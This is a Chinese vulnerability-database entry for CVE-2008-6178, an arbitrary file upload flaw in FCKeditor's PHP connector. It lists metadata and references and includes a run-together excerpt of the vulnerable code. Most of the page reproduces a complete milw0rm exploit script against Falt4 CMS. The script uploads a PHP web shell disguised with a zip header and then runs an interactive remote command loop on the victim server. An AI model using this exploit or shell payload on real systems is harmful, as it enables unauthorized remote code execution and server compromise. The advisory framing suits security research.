FCKeditor connector.php任意文件上传漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117402 漏洞类型 代码注入
发布时间 2009-02-16 更新时间 2009-02-24
CVE编号 CVE-2008-6178 CNNVD-ID CNNVD-200902-405
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8060
https://cxsecurity.com/issue/WLB-2009020215
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-405
|漏洞详情
CKSourceFCKeditor(现称CKEditor)是波兰CKSource公司的一套开源的、基于网页的文字编辑器。该编辑器具有轻量化、易于安装等特点。FCKeditor的editor/filemanager/browser/default/connectors/php/connector.php模块中存在文件上传限制漏洞:147.functionFileUpload($resourceType,$currentFolder)148.{149.$sErrorNumber='0';150.$sFileName='';151.152.if(isset($_FILES['NewFile'])&&!is_null($_FILES['NewFile']['tmp_name']))153.{154.$oFile=$_FILES['NewFile'];155.156.//Mapthevirtualpathtothelocalserverpath.157.$sServerDir=ServerMapFolder($resourceType,$currentFolder);158.159.//Gettheuploadedfilename.160.$sFileName=$oFile['name'];161.$sOriginalFileName=$sFileName;162.//Securityfixbytruzone01-15-2006163.//$sExtension=substr($sFileName,(strrpos($sFileName,'.')+1));164.//$sExtension=strtolower($sExtension);165.166.if(extension_loaded("mime_magic")){167.$sExtension=mime_content_type($oFile['tmp_name']);168.}else{169.$sExtension=$oFile['type'];170.}171.//enofsecurityfixbytruzone01-15-2006172.global$Config;173.174.$arAllowed=$Config['AllowedExtensions'][$resourceType];175.$arDen
|漏洞EXP
################################################################
#
# Falt4 CMS (fckeditor) Arbitrary File Upload Exploit
#
# Bug Discovered By : Sp3shial
#
# Sp3shial@ymail.com
#
# Persian Boys Hacking Team From A Land With A History-Long Background
#
# Download CMS : http://downloads.sourceforge.net/falt4/falt4extreme.zip?modtime=1196845455&big_mirror=0
#
###############################################################

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

define(STDIN, fopen("php://stdin", "r"));

function http_send($host, $packet)
{
	$sock = fsockopen($host, 80);
	while (!$sock)
	{
		print "\n[-] No response from {$host}:80 Trying again...";
		$sock = fsockopen($host, 80);
	}
	fputs($sock, $packet);
	while (!feof($sock)) $resp .= fread($sock, 1024);
	fclose($sock);
	return $resp;
}

function connector_response($html)
{
	return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}

print "\n+------------------------------------------------------------------+";
print "\n| Falt4 CMS (fckeditor) Arbitrary File Upload Exploit by Sp3shial  |";
print "\n+------------------------------------------------------------------+\n";

if ($argc < 3)
{
	print "\nUsage......: php $argv[0] host path";
	print "\nExample....: php $argv[0] localhost /";
	print "\nExample....: php $argv[0] localhost /Falt4/\n";
	die();
}

$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);

$filename  = md5(time()).".php";
$connector = "modules/newsletter/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";

$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: application/zip\r\n\r\n";
$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
$payload .= "--o0oOo0o--\r\n";

$packet	 = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet	.= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Shell uploaded to {$filename}...starting it!\n";

$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root 

$packet  = "GET {$path}{$filename} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while(1)
{
	print "\nFalt4-shell# ";
	$cmd = trim(fgets(STDIN));
	if ($cmd != "exit")
	{
		$response = http_send($host, sprintf($packet, base64_encode($cmd)));
		preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
	}
	else break;
}

?>

# milw0rm.com [2009-02-16]
|参考资料

来源:XF
名称:falt4-fckeditor-file-upload(48769)
链接:http://xforce.iss.net/xforce/xfdb/48769
来源:BID
名称:31812
链接:http://www.securityfocus.com/bid/31812
来源:MILW0RM
名称:8060
链接:http://www.milw0rm.com/exploits/8060
来源:VUPEN
名称:ADV-2009-0447
链接:http://www.frsirt.com/english/advisories/2009/0447
来源:SECUNIA
名称:33973
链接:http://secunia.com/advisories/33973